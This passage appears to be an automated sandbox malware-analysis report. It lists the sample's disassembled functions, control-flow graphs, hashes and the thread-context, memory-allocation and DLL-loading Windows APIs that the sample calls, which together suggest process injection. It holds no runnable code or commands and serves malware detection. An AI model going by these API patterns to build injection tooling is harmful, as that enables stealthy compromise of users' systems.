                                                                                                                                                              control_flow_graph 217 40ada3-40adbf 218 40adc5-40ae04 call 4097d3 217->218 219 40adc0 call 4097c3 217->219 222 40aee2-40af13 NtReadFile 218->222 223 40ae0a-40ae4f call 409863 call 42b882 call 409733 call 42b882 218->223 219->218 225 40afb0-40afbc 222->225 226 40af19-40af20 222->226 245 40ae5a-40ae60 223->245 228 40af2b-40af31 226->228 230 40af33-40af57 228->230 231 40af59-40af5d 228->231 230->228 234 40af9f-40afad call 409863 231->234 235 40af5f-40af66 231->235 234->225 238 40af71-40af77 235->238 238->234 241 40af79-40af9d 238->241 241->238 246 40ae62-40ae86 245->246 247 40ae88-40ae8c 245->247 246->245 247->222 249 40ae8e-40aea9 247->249 250 40aeb4-40aeba 249->250 250->222 251 40aebc-40aee0 250->251 251->250
                                                                                                                                                              APIs
                                                                                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040AF06
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              • Opcode ID: 85a89d8992471b92ffb2d43eef22a062ed743e0913ce14f7d9fa0da6e664859a
                                                                                                                                                              • Instruction ID: fc9d2199742c9a8d060674d21e47953af395a2044174ee8fd2e3237901ead3e6
                                                                                                                                                              • Opcode Fuzzy Hash: 85a89d8992471b92ffb2d43eef22a062ed743e0913ce14f7d9fa0da6e664859a
                                                                                                                                                              • Instruction Fuzzy Hash: DB713DB1E14258DFCB04CFA9C490AEDBBF5BF4D304F18816AE459B7341D234A952CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040B623 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 253 40b623-40b684 call 4097c3 call 4097d3 258 40b762-40b787 NtAllocateVirtualMemory 253->258 259 40b68a-40b6cf call 409863 call 42b882 call 409733 call 42b882 253->259 261 40b824-40b830 258->261 262 40b78d-40b794 258->262 281 40b6da-40b6e0 259->281 264 40b79f-40b7a5 262->264 265 40b7a7-40b7cb 264->265 266 40b7cd-40b7d1 264->266 265->264 269 40b813-40b821 call 409863 266->269 270 40b7d3-40b7da 266->270 269->261 272 40b7e5-40b7eb 270->272 272->269 275 40b7ed-40b811 272->275 275->272 282 40b6e2-40b706 281->282 283 40b708-40b70c 281->283 282->281 283->258 284 40b70e-40b729 283->284 286 40b734-40b73a 284->286 286->258 287 40b73c-40b760 286->287 287->286
                                                                                                                                                              APIs
                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B77A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                              • Opcode ID: fadf59258bf36b7a3c0f85c6cf86162f688c6e76b45417ae3e42d9c532fb0ac8
                                                                                                                                                              • Instruction ID: f26121f830c0f8109234ac70a2951215a16cc0557d90fb1a5981705e0bebb243
                                                                                                                                                              • Opcode Fuzzy Hash: fadf59258bf36b7a3c0f85c6cf86162f688c6e76b45417ae3e42d9c532fb0ac8
                                                                                                                                                              • Instruction Fuzzy Hash: 9B712A75E14158DFCB04CFA9C490AEDBBF5AF89304F18806AE459B7391D338A942CF98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040A123 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 361 40a123-40a184 call 4097c3 call 4097d3 366 40a262-40a277 NtSetContextThread 361->366 367 40a18a-40a1cf call 409863 call 42b882 call 409733 call 42b882 361->367 369 40a314-40a320 366->369 370 40a27d-40a284 366->370 389 40a1da-40a1e0 367->389 372 40a28f-40a295 370->372 373 40a297-40a2bb 372->373 374 40a2bd-40a2c1 372->374 373->372 377 40a303-40a311 call 409863 374->377 378 40a2c3-40a2ca 374->378 377->369 381 40a2d5-40a2db 378->381 381->377 384 40a2dd-40a301 381->384 384->381 390 40a1e2-40a206 389->390 391 40a208-40a20c 389->391 390->389 391->366 393 40a20e-40a229 391->393 394 40a234-40a23a 393->394 394->366 395 40a23c-40a260 394->395 395->394
                                                                                                                                                              APIs
                                                                                                                                                              • NtSetContextThread.NTDLL(?,?), ref: 0040A26A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ContextThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1591575202-0
                                                                                                                                                              • Opcode ID: 8e1b16207460c74ecb583fa993db847e50e0fae833e5e0f8ab41b91e0412513e
                                                                                                                                                              • Instruction ID: 9b1aa35c00d12f4d4ec830877887629837b7e68d82d172a387a58b949419f852
                                                                                                                                                              • Opcode Fuzzy Hash: 8e1b16207460c74ecb583fa993db847e50e0fae833e5e0f8ab41b91e0412513e
                                                                                                                                                              • Instruction Fuzzy Hash: 32714D71E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE859B7381D239A952DF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040B213 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 397 40b213-40b22f 398 40b235-40b274 call 4097d3 397->398 399 40b230 call 4097c3 397->399 402 40b352-40b368 NtDelayExecution 398->402 403 40b27a-40b2bf call 409863 call 42b882 call 409733 call 42b882 398->403 399->398 404 40b405-40b411 402->404 405 40b36e-40b375 402->405 425 40b2ca-40b2d0 403->425 407 40b380-40b386 405->407 409 40b388-40b3ac 407->409 410 40b3ae-40b3b2 407->410 409->407 414 40b3f4-40b402 call 409863 410->414 415 40b3b4-40b3bb 410->415 414->404 417 40b3c6-40b3cc 415->417 417->414 420 40b3ce-40b3f2 417->420 420->417 426 40b2d2-40b2f6 425->426 427 40b2f8-40b2fc 425->427 426->425 427->402 428 40b2fe-40b319 427->428 430 40b324-40b32a 428->430 430->402 431 40b32c-40b350 430->431 431->430
                                                                                                                                                              APIs
                                                                                                                                                              • NtDelayExecution.NTDLL(0041A6B1,?,?,?,00000000), ref: 0040B35B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DelayExecution
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1249177460-0
                                                                                                                                                              • Opcode ID: b72b665b74fb54d89f454fa359837e64855619780894ba6584d0cb01522ea78b
                                                                                                                                                              • Instruction ID: 3be60250fe5fbc5b7b76b1735ee417b9946c579d890d9e13bfe27a8a66749d08
                                                                                                                                                              • Opcode Fuzzy Hash: b72b665b74fb54d89f454fa359837e64855619780894ba6584d0cb01522ea78b
                                                                                                                                                              • Instruction Fuzzy Hash: 09712E71D14158DBCB05CFA9C490AEDBBF1EF49304F1880AAE859B7341D738AA41DF98
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00409D23 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 289 409d23-409d84 call 4097c3 call 4097d3 294 409e62-409e77 NtSuspendThread 289->294 295 409d8a-409dcf call 409863 call 42b882 call 409733 call 42b882 289->295 296 409f14-409f20 294->296 297 409e7d-409e84 294->297 317 409dda-409de0 295->317 299 409e8f-409e95 297->299 302 409e97-409ebb 299->302 303 409ebd-409ec1 299->303 302->299 306 409f03-409f11 call 409863 303->306 307 409ec3-409eca 303->307 306->296 310 409ed5-409edb 307->310 310->306 311 409edd-409f01 310->311 311->310 318 409de2-409e06 317->318 319 409e08-409e0c 317->319 318->317 319->294 320 409e0e-409e29 319->320 322 409e34-409e3a 320->322 322->294 323 409e3c-409e60 322->323 323->322
                                                                                                                                                              APIs
                                                                                                                                                              • NtSuspendThread.NTDLL(?,?), ref: 00409E6A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: SuspendThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3178671153-0
                                                                                                                                                              • Opcode ID: adcfe1a8fc1bb45aaabbcc311c2c61f2764369a01feb8d5aeeaa2fe2c21b4f98
                                                                                                                                                              • Instruction ID: e47e113cf92a57b1ac52dd662de8fcc24e3456a203539e49cba6bfabcd542c9a
                                                                                                                                                              • Opcode Fuzzy Hash: adcfe1a8fc1bb45aaabbcc311c2c61f2764369a01feb8d5aeeaa2fe2c21b4f98
                                                                                                                                                              • Instruction Fuzzy Hash: 55711C71E14158DFCB04CFA9C490AEDBBF5AF49314F18806AE459B7382D638AD42DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00409F23 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 325 409f23-409f84 call 4097c3 call 4097d3 330 40a062-40a077 NtGetContextThread 325->330 331 409f8a-409fcf call 409863 call 42b882 call 409733 call 42b882 325->331 333 40a114-40a120 330->333 334 40a07d-40a084 330->334 353 409fda-409fe0 331->353 335 40a08f-40a095 334->335 337 40a097-40a0bb 335->337 338 40a0bd-40a0c1 335->338 337->335 341 40a103-40a111 call 409863 338->341 342 40a0c3-40a0ca 338->342 341->333 345 40a0d5-40a0db 342->345 345->341 348 40a0dd-40a101 345->348 348->345 354 409fe2-40a006 353->354 355 40a008-40a00c 353->355 354->353 355->330 356 40a00e-40a029 355->356 358 40a034-40a03a 356->358 358->330 359 40a03c-40a060 358->359 359->358
                                                                                                                                                              APIs
                                                                                                                                                              • NtGetContextThread.NTDLL(?,?), ref: 0040A06A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ContextThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1591575202-0
                                                                                                                                                              • Opcode ID: c486c64c00cd5f5b8c72e1e55815e763dc87eb2ab1f6ce2e21a35978956b8d16
                                                                                                                                                              • Instruction ID: cb0abd5b403f6b9fc28d3a6aa314449394bfc664419b332a47aa0db7b876805e
                                                                                                                                                              • Opcode Fuzzy Hash: c486c64c00cd5f5b8c72e1e55815e763dc87eb2ab1f6ce2e21a35978956b8d16
                                                                                                                                                              • Instruction Fuzzy Hash: 52714C71E0425CDFCB04CFA9C490AEDBBF1AF49304F1880AAE459B7381D239AA52CF55
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004173F3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 433 4173f3-41740f 434 417417-41741c 433->434 435 417412 call 42af83 433->435 436 417422-417430 call 42b4a3 434->436 437 41741e-417421 434->437 435->434 440 417440-417451 call 429943 436->440 441 417432-41743d call 42b723 436->441 446 417453-417467 LdrLoadDll 440->446 447 41746a-41746d 440->447 441->440 446->447
                                                                                                                                                              APIs
                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417465
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Load
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                              • Opcode ID: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                                                                                                              • Instruction ID: 1361856df78bc134776308968c2a22ed589fa1034180a1cbb88d919f5dfdd5b0
                                                                                                                                                              • Opcode Fuzzy Hash: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                                                                                                              • Instruction Fuzzy Hash: 85011EB5E4020DABDB10DAA5ED42FDEB7789B54308F00819AE90897241F635EB588B95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00428453 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • NtClose.NTDLL(0041A658,?,?,00000000,?,0041A658,?,?,?,?,?,?,?,?,00000000,?), ref: 0042848A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                                                                                                              • Instruction ID: 8f31afb53f65978ff8a5df44bbc3e5722fab298bbb2beb57612707ad3f89b0d5
                                                                                                                                                              • Opcode Fuzzy Hash: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                                                                                                              • Instruction Fuzzy Hash: 0EE086712106147BD120FA5ADC41F97B76CEFC6715F40801AFA08AB242C670790587F5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 5119fbf7799fb7e6a57163a2ab5717523d53acf4a132df679d55a51eb4d9017f
                                                                                                                                                              • Instruction ID: 4f5c3802fb4b7742b5a23f9ba435ed74dd2018eef5863b7add6d916cabed5e9d
                                                                                                                                                              • Opcode Fuzzy Hash: 5119fbf7799fb7e6a57163a2ab5717523d53acf4a132df679d55a51eb4d9017f
                                                                                                                                                              • Instruction Fuzzy Hash: 39900261202400074105759D4814616404AA7E0611B59C425E1014990DC56689916225
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: b0f3d39b23c364e8f0752566133ec8bf23fba33ef16759b62c8429b600cc9b70
                                                                                                                                                              • Instruction ID: 34fed4c6b029f2b6ef0d810d77237e95173b76e2c54fc84c1349358af9550896
                                                                                                                                                              • Opcode Fuzzy Hash: b0f3d39b23c364e8f0752566133ec8bf23fba33ef16759b62c8429b600cc9b70
                                                                                                                                                              • Instruction Fuzzy Hash: 3490023120140417D111759D49047070049A7D0651F99C816A0424958DD6978A52A221
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 9c94603489932eebf42451af0b7e4b9043eeaa2f071405b6cac59e0b3e021337
                                                                                                                                                              • Instruction ID: 21ab2006751641ba5a44771b1cd1e3d4c1a6b7e2d528fcf58d78a3f6bad38dd8
                                                                                                                                                              • Opcode Fuzzy Hash: 9c94603489932eebf42451af0b7e4b9043eeaa2f071405b6cac59e0b3e021337
                                                                                                                                                              • Instruction Fuzzy Hash: 2790023120148806D110759D880474A0045A7D0711F5DC815A4424A58DC6D689917221
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 015B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1792171632.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_1540000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 640526cc6b87ba9ca2d8c44e3950e7ef4861e06f0bab1d6f0056db4244b0cd06
                                                                                                                                                              • Instruction ID: 8bcf08380ab0fb2dfbac47aafb864ecd3226eec1f5e8d80db1049d97c907147b
                                                                                                                                                              • Opcode Fuzzy Hash: 640526cc6b87ba9ca2d8c44e3950e7ef4861e06f0bab1d6f0056db4244b0cd06
                                                                                                                                                              • Instruction Fuzzy Hash: 4790023160550406D100759D49147061045A7D0611F69C815A0424968DC7D68A5166A2
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00413A8D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 36 413a8d-413a90 37 413b01-413b02 36->37 38 413a92 36->38 39 413a93-413aa2 38->39 40 413ac9-413aca 38->40 41 413aa4-413aac 39->41 42 413a4f-413a52 39->42 40->39 43 413acc-413ace 40->43 44 413adf 41->44 43->44 45 413af4-413b42 43->45 47 413ae1-413ae6 44->47 48 413ae8-413aee 44->48 49 413b54-413b5d 45->49 50 413b44-413b4c 45->50 47->48 51 413af0-413af3 48->51 52 413b6f-413b8b 48->52 49->52 50->49 51->45 53 413bfd-413c5d call 42a323 call 42ad33 call 4173f3 call 4046e3 call 423e53 52->53 54 413b8d-413bea 52->54 68 413c7d-413c83 53->68 69 413c5f-413c6e PostThreadMessageW 53->69 69->68 70 413c70-413c7a 69->70 70->68
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 7e327r58$7e327r58
                                                                                                                                                              • API String ID: 0-4105805501
                                                                                                                                                              • Opcode ID: d45de8c7b50298374bac702908ff5e65982283c5d550219a6107e280cf31b49d
                                                                                                                                                              • Instruction ID: cd7b0ebc4f312fe051f5a44f46a53db313936eba4b75457889bdb1bd7ecce334
                                                                                                                                                              • Opcode Fuzzy Hash: d45de8c7b50298374bac702908ff5e65982283c5d550219a6107e280cf31b49d
                                                                                                                                                              • Instruction Fuzzy Hash: BC41C333549289AEC7029F745C415DEBF78EE81365B5841DFE4809B503D22A5B87C7C6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00413BEB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 71 413beb-413c05 73 413c0d-413c5d call 42ad33 call 4173f3 call 4046e3 call 423e53 71->73 74 413c08 call 42a323 71->74 83 413c7d-413c83 73->83 84 413c5f-413c6e PostThreadMessageW 73->84 74->73 84->83 85 413c70-413c7a 84->85 85->83
                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                              • String ID: 7e327r58$7e327r58
                                                                                                                                                              • API String ID: 1836367815-4105805501
                                                                                                                                                              • Opcode ID: adcceddb6a4681dd82a74107d39f3fbb2828151b626a08a6d540b20f6b9e8212
                                                                                                                                                              • Instruction ID: 5cd8f1ba56ca66e7765762b9b338afedcaf28b67fd49832bfc28183128bb71e6
                                                                                                                                                              • Opcode Fuzzy Hash: adcceddb6a4681dd82a74107d39f3fbb2828151b626a08a6d540b20f6b9e8212
                                                                                                                                                              • Instruction Fuzzy Hash: AE01A572D0015C7ADB10AAE19C81DEFBB7CDF41798F408169FE1467240E57C4F468BA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00413BF3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 86 413bf3-413c05 87 413c0d-413c5d call 42ad33 call 4173f3 call 4046e3 call 423e53 86->87 88 413c08 call 42a323 86->88 97 413c7d-413c83 87->97 98 413c5f-413c6e PostThreadMessageW 87->98 88->87 98->97 99 413c70-413c7a 98->99 99->97
                                                                                                                                                              APIs
                                                                                                                                                              • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                                              • String ID: 7e327r58$7e327r58
                                                                                                                                                              • API String ID: 1836367815-4105805501
                                                                                                                                                              • Opcode ID: 68306d0fe5426d68deaf2a8dbc272079cdc72e99b8a943e4d65e1200b1802fd1
                                                                                                                                                              • Instruction ID: 2b11c294a3421bd6dee33fc7c99cb899cc9a872ef9e39964c471318ebb4cf5bc
                                                                                                                                                              • Opcode Fuzzy Hash: 68306d0fe5426d68deaf2a8dbc272079cdc72e99b8a943e4d65e1200b1802fd1
                                                                                                                                                              • Instruction Fuzzy Hash: E101C4B2D0015C7ADB00AAE19C81DEF7B7CDF41698F408069FE14B7240E57C4F068BA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00428763 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RtlFreeHeap.NTDLL(004122B5,?,004122B5,?,00000000,004122B5,?,004122B5,?,?), ref: 004287A2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                              • Opcode ID: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                                                                                                              • Instruction ID: 2c1a71614233d00c30b3bb4d428e9b765d3603c09bbdcb5fe6948e3b9beed476
                                                                                                                                                              • Opcode Fuzzy Hash: 084c3a0141a29753b9564923c41a14955e4b30b2448ffbc91be334a51728e4f3
                                                                                                                                                              • Instruction Fuzzy Hash: B4E092B22043487BD610EE99EC81FDB37ACEFC5710F404419F908A7241C670BD108BB8
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00428713 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00419A10,?,?,00419A10,?,?,?,00419A10,?,00002000), ref: 0042874F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_WrrCV4QR2J.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
